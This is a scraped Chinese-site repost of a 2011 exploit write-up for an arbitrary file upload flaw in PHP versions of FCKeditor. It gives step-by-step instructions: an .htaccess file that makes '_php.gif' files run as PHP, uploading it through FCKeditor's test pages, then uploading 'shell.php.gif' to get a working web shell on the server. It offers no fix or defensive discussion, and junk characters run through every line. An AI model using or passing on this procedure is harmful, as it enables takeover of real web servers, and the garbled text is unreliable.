FCKeditor所有php版本Upload上传漏洞1 g" W# u8 z6 l
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
4 `% s! t* H c减小字体 增大字体% L" g* ?" j( h% [1 i9 {; h
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
6 m0 u8 x& F4 p% X2 U[+] Date: 2011
; E1 E" o& ?, j5 f! \* u0 `; z: y6 L. [[+] Author : sinesafe.cn
8 {0 N8 h+ @7 ][+] Website : WwW.sinesafe.cn; Y6 r! Q! |7 O, |7 v0 Z
———————————————————+ p. u) L- ` ?4 M( Y i& a" D
1.create a htaccess file:
, | P7 L! M# F: q: Wcode:
- N2 e& n9 e; b* A! [# ]& x7 `<FilesMatch “_php.gif”>
8 d( ]0 @" Z- E- |8 s7 _7 H6 z9 f) rSetHandler application/x-httpd-php! W9 ]( B+ o6 j3 S+ |
</FilesMatch>8 ~% q; O' H$ d8 j) D% ^3 ^$ i
* q( @# b$ l: r' Z5 {4 n
2.Now upload this htaccess with FCKeditor.
$ B7 ~" j# G& ~1 W
7 K2 d. u' P; B' U1 k" D; \3 shttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
" ?9 ]0 ]+ T W3 [- ^0 A( ?8 e& w. G
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html; h2 c& {: G/ x0 Z! q2 C
: u. y; o! l" T1 H- u0 G# T. \
———————————————————————————————-
6 n% E# A @9 [3 o1 L4 Q3.Now upload shell.php.gif with FCKeditor.
$ I) n2 B- J" e' r2 f6 h5 R8 k4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
8 {4 e, D5 A1 F5.http://www.sinesafe.cn/anything/shell_php.gif
$ Y6 J3 ]& f3 l, {* T6.Now shell is available from server. |
' @# [% b5 j; K- G( J$ S
1 M0 ^5 w4 T+ B9 p" `6 l& r; M, T
' c1 O* B) @0 n: ^% f: L/ N, p |